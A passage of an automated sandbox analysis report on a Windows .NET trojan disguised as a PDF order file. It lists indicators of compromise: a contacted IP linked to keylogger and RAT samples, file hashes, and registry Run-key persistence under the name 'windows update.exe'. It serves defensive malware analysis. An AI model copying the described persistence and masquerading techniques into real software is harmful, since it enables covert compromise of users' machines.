                                https://entityframework-extensions.net/)Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.microsoft.InstallUtil.exe, 00000002.00000002.2238847838.0000000001676000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.zzzprojects.comOrder88983273293729387293828PDF.exefalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://bulk-operations.net/pricing.Order88983273293729387293828PDF.exefalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.oleonidas.grOrder88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://entityframework-extensions.net/include-graph).Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://entityframework-extensions.net/pricing.Order88983273293729387293828PDF.exefalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://dapper-plus.net/getting-started-mapping#instance-context-mappingOrder88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://linqtosql-plus.net/pricing.Order88983273293729387293828PDF.exefalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://github.com/mgravell/protobuf-netiOrder88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmpfalse
                                    		high
                                    https://entityframework-extensions.net/md5-exceptionXOrder88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://stackoverflow.com/q/11564914/23354;Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                      		high
                                      https://stackoverflow.com/q/2152978/23354Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmpfalse
                                        		high
                                        http://entityframework-plus.net/Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://github.com/npgsql/npgsql/issues/2623#issuecomment-627622215Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://stackoverflow.com/q/2152978/23354sCannotOrder88983273293729387293828PDF.exe, 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                            		high
                                            https://ipwho.is/Order88983273293729387293828PDF.exe, 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameOrder88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2240428328.0000000003231000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://dapper-plus.netOrder88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                185.78.221.73
                                                		oleonidas.grGreece
                                                		47521IPHOSTGRIpDomainGRfalse

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1557778
                                                Start date and time:2024-11-18 16:22:06 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 6m 50s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:11
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:Order88983273293729387293828PDF.exe
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@10/6@1/1
                                                EGA Information:
                                                • Successful, ratio: 40%
                                                HCA Information:
                                                • Successful, ratio: 96%
                                                • Number of executed functions: 188
                                                • Number of non-executed functions: 14
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe

                                                Warnings

                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target windows update.exe, PID 1360 because it is empty
                                                • Execution Graph export aborted for target windows update.exe, PID 4308 because it is empty
                                                • Execution Graph export aborted for target windows update.exe, PID 7100 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: Order88983273293729387293828PDF.exe

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                10:23:05API Interceptor63x Sleep call for process: Order88983273293729387293828PDF.exe modified
                                                16:23:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Svchost "C:\Users\user\AppData\Roaming\SubDir\windows update.exe"
                                                16:23:26AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Svchost "C:\Users\user\AppData\Roaming\SubDir\windows update.exe"

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                185.78.221.73Order88983273293729387293828PDF.exeGet hashmaliciousQuasarBrowse
                                                  e-dekont (72).pdf(#U007e56 KB).exeGet hashmaliciousSnake KeyloggerBrowse
                                                    DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exeGet hashmaliciousDarkCloudBrowse
                                                      RFQ 4748.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        PurchOrd_75238572.pdf.exeGet hashmaliciousSnake KeyloggerBrowse

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          IPHOSTGRIpDomainGROrder88983273293729387293828PDF.exeGet hashmaliciousQuasarBrowse
                                                          • 185.78.221.73
                                                          e-dekont (72).pdf(#U007e56 KB).exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 185.78.221.73
                                                          DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exeGet hashmaliciousDarkCloudBrowse
                                                          • 185.78.221.73
                                                          RFQ 4748.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 185.78.221.73
                                                          PurchOrd_75238572.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 185.78.221.73
                                                          433.docx.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                          • 185.78.220.138
                                                          https://ktima-edem.gr/gbzuv/?09812432Get hashmaliciousUnknownBrowse
                                                          • 93.174.123.195
                                                          https://andronikidis.gr/3nxw1/?31759481Get hashmaliciousUnknownBrowse
                                                          • 93.174.123.207
                                                          Prices_Required.exeGet hashmaliciousDarkCloudBrowse
                                                          • 185.78.220.151
                                                          pw5tgKfhDO.elfGet hashmaliciousMiraiBrowse
                                                          • 185.78.220.47

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          3b5074b1b5d032e5620f69f9f700ff0ehttps://www.figma.com/files/team/1440352672505295724/recents-and-sharing?fuid=1440352668792061854Get hashmaliciousUnknownBrowse
                                                          • 185.78.221.73
                                                          https://www.google.co.th/url?q=sf_rand_string_uppercase(33)uQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%20xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%62%65%73%74%73%63%72%65%65%6E%69%6E%67%73%65%72%76%69%63%65%2E%63%6F%6D%2F%77%69%6E%6E%6D%2F%6B%6F%6C%69%6E%6E%2F%6B%6F%6F%6C%2Ftest@gmail.comGet hashmaliciousUnknownBrowse
                                                          • 185.78.221.73
                                                          https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/kovitz.net%2Fyvbw%2F9424537096/ZGViQG1hcnRpbmpveWNlLmNvbQ==Get hashmaliciousUnknownBrowse
                                                          • 185.78.221.73
                                                          Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 185.78.221.73
                                                          phish_alert_sp1_1.0.0.0(1).emlGet hashmaliciousKnowBe4Browse
                                                          • 185.78.221.73
                                                          voi.batGet hashmaliciousUnknownBrowse
                                                          • 185.78.221.73
                                                          bPRQRIfbbq.exeGet hashmaliciousUnknownBrowse
                                                          • 185.78.221.73
                                                          New Order Data sheet Page.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                          • 185.78.221.73
                                                          http://dailyfragrancedeals.comGet hashmaliciousUnknownBrowse
                                                          • 185.78.221.73
                                                          bPRQRIfbbq.exeGet hashmaliciousUnknownBrowse
                                                          • 185.78.221.73

                                                          Dropped Files

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\Users\user\AppData\Roaming\SubDir\windows update.exeFactura modificada____678979879.exeGet hashmaliciousDarkCloudBrowse
                                                            Lista de cotizaciones.exeGet hashmaliciousDarkCloudBrowse
                                                              ORDER REF_47806798 .exeGet hashmaliciousXWormBrowse
                                                                chiara.exeGet hashmaliciousCryptOne, DarkTortilla, Mofksys, XWormBrowse
                                                                  Bank Details.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                    Signed Document..exeGet hashmaliciousRemcos, DarkTortilla, PureLog StealerBrowse
                                                                      PO CONTRACT.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                        image.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                          ABA NEW ORDER No.2400228341.pdf.exeGet hashmaliciousAsyncRATBrowse
                                                                            09099627362726.exeGet hashmaliciousAgentTeslaBrowse

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1119
                                                                              Entropy (8bit):5.345080863654519
                                                                              Encrypted:false
                                                                              SSDEEP:24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0Hj
                                                                              MD5:E6726BABA80C39624BADA32F0CCE6B54
                                                                              SHA1:4C769FA8A02DBE33AA9084040A9E6C70230334FA
                                                                              SHA-256:6A9F9C628B47AFC2A34A71826450A12D9293709BF977E72C04102F9DDD3705E0
                                                                              SHA-512:BBCCE0FCC59D29116253E71ECC786B8E3BA19D9A3124F36FEC9963C7F47016F145C76C18C5AD0FB6186ADEA69652BA99F29EF5AB5E71EFDD7EC07A82BB366960
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\windows update.exe.log

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\SubDir\windows update.exe
                                                                              File Type:CSV text
                                                                              Category:modified
                                                                              Size (bytes):1089
                                                                              Entropy (8bit):5.3331074454898735
                                                                              Encrypted:false
                                                                              SSDEEP:24:ML9E4KlKNE4oK2nMK/KDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlIHoVnM6YHKh3oPtHo6hAHKzeR
                                                                              MD5:E54FE55F93C5501D5C4737CCF0E6E48B
                                                                              SHA1:BEF9C1A7166E3E8C2C7762C42F8FCBB753B63283
                                                                              SHA-256:2434AE4C4C8436A64A4F3317638DF77C38CB7FFC226037ADE1DC6F6CD4745619
                                                                              SHA-512:5422F02595B12ACFE23AF8C69ACF43B5529C700FC3FA5ADEDDBDFF36737C22D7AE23FCD4A39869DF6D02D7D708F951142983E60ED90EADFDCE5CC40B164AD19D
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\48ee4ec9441351bbe4d9095c96b8ea01\System.Configuration.Install.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\Nati

                                                                              C:\Users\user\AppData\Roaming\SubDir\windows update.exe

                                                                              Download File
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):42064
                                                                              Entropy (8bit):6.19564898727408
                                                                              Encrypted:false
                                                                              SSDEEP:384:qtpFVLK0MsihB9VKS7xdgl6KJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+RPZTg:GBMs2SqdSZ6Iq8BxTfqWR8h7ukP
                                                                              MD5:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                              SHA1:F0209900FBF08D004B886A0B3BA33EA2B0BF9DA8
                                                                              SHA-256:AC1A3F21FCC88F9CEE7BF51581EAFBA24CC76C924F0821DEB2AFDF1080DDF3D3
                                                                              SHA-512:9AC94880684933BA3407CDC135ABC3047543436567AF14CD9269C4ADC5A6535DB7B867D6DE0D6238A21B94E69F9890DBB5739155871A624520623A7E56872159
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Joe Sandbox View:
                                                                              • Filename: Factura modificada____678979879.exe, Detection: malicious, Browse
                                                                              • Filename: Lista de cotizaciones.exe, Detection: malicious, Browse
                                                                              • Filename: ORDER REF_47806798 .exe, Detection: malicious, Browse
                                                                              • Filename: chiara.exe, Detection: malicious, Browse
                                                                              • Filename: Bank Details.exe, Detection: malicious, Browse
                                                                              • Filename: Signed Document..exe, Detection: malicious, Browse
                                                                              • Filename: PO CONTRACT.exe, Detection: malicious, Browse
                                                                              • Filename: image.exe, Detection: malicious, Browse
                                                                              • Filename: ABA NEW ORDER No.2400228341.pdf.exe, Detection: malicious, Browse
                                                                              • Filename: 09099627362726.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,>.]..............0..T...........r... ........@.. ....................................`.................................4r..O....................b..PB...........p............................................... ............... ..H............text....R... ...T.................. ..`.rsrc................V..............@..@.reloc...............`..............@..B................hr......H........"..|J..........lm.......o......................................2~.....o....*.r...p(....*VrK..p(....s.........*..0..........(....(....o....o....(....o.... .....T(....o....(....o....o ...o!....4(....o....(....o....o ...o".....(....rm..ps#...o....($........(%....o&....ry..p......%.r...p.%.(.....(....('....((.......o)...('........*.*................"..(*...*..{Q...-...}Q.....(+...(....(,....(+...*"..(-...*..(....*..(.....r...p.(/...o0...s....}T...*....0.. .......~S...-.s

                                                                              \Device\ConDrv

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\SubDir\windows update.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2017
                                                                              Entropy (8bit):4.659840607039457
                                                                              Encrypted:false
                                                                              SSDEEP:48:zK4QsD4ql0+1AcJRy0EJP64gFljVlWo3ggxUnQK2qmBvgw1+5:zKgDEcTytNe3Wo3uQVBIe+5
                                                                              MD5:3BF802DEB390033F9A89736CBA5BFAFF
                                                                              SHA1:25A7177A92E0283B99C85538C4754A12AC8AD197
                                                                              SHA-256:5202EB464D6118AC60F72E89FBAAACF1FB8CF6A232F98F47F88D0E7B2F3AFDB3
                                                                              SHA-512:EB4F440D28ECD5834FD347F43D4828CA9FEE900FF003764DD1D18B95E0B84E414EAECF70D75236A1463366A189BC5CBA21613F79B5707BF7BDB3CEA312CCE4F7
                                                                              Malicious:false
                                                                              Preview:Microsoft (R) .NET Framework Installation utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....Usage: InstallUtil [/u | /uninstall] [option [...]] assembly [[option [...]] assembly] [...]]....InstallUtil executes the installers in each given assembly...If the /u or /uninstall switch is specified, it uninstalls..the assemblies, otherwise it installs them. Unlike other..options, /u applies to all assemblies, regardless of where it..appears on the command line.....Installation is done in a transactioned way: If one of the..assemblies fails to install, the installations of all other..assemblies are rolled back. Uninstall is not transactioned.....Options take the form /switch=[value]. Any option that occurs..before the name of an assembly will apply to that assembly's..installation. Options are cumulative but overridable - options..specified for one assembly will apply to the next as well unless..the option is specified with a new value. The default for

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):5.909823975017993
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                              File name:Order88983273293729387293828PDF.exe
                                                                              File size:1'484'800 bytes
                                                                              MD5:9c23449ea828b1d7d4473aa70f86caa8
                                                                              SHA1:474136c0e6d3d7c00a2e4f1b1e41f831fbb6dcba
                                                                              SHA256:7c9b4c774fbf907cf1858ea31454992e16d6b6521f880fcd8a12433ce25b6b35
                                                                              SHA512:843a03c44436410ae67a56ca00e4f3c19461979f4211b848eadf0ca02641ec3ee13a38f38e03bc316e028aceaa7571e41d1163e7d0933fe0e12d28ea1fae0925
                                                                              SSDEEP:12288:Er0K/EsBQT93xj6mZw7Y/zLZefq5U6t1uxSxwOz7MIAvKcz9eoJEtww2LOB:ES3V1w8kzSGOzwFV93O
                                                                              TLSH:98653B0523A8A635D5BE4B366EF20C1487B3F24793E1EB9A4EC8B8E954537647D0C363
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;g................................. ........@.. ....................................`................................

                                                                              File Icon

                                                                              Icon Hash:00928e8e8686b000

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x56bd1e
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x673B1492 [Mon Nov 18 10:18:58 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x16bccc0x4f.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x16c0000x600.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x16e0000xc.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x20000x169d240x169e002bcc95b1031270eb64fa80708b0db782False0.3340369980569948data5.9126749216074055IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0x16c0000x6000x600e5e88fec0e419a3145f0150cf93f440fFalse0.419921875data4.11655846446106IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0x16e0000xc0x200ceb03a5f00f1c1b196e29cef5ebb3862False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_VERSION0x16c0a00x32cdata0.4248768472906404
                                                                              RT_MANIFEST0x16c3cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                              Imports

                                                                              DLLImport
                                                                              mscoree.dll_CorExeMain

                                                                              Network Behavior

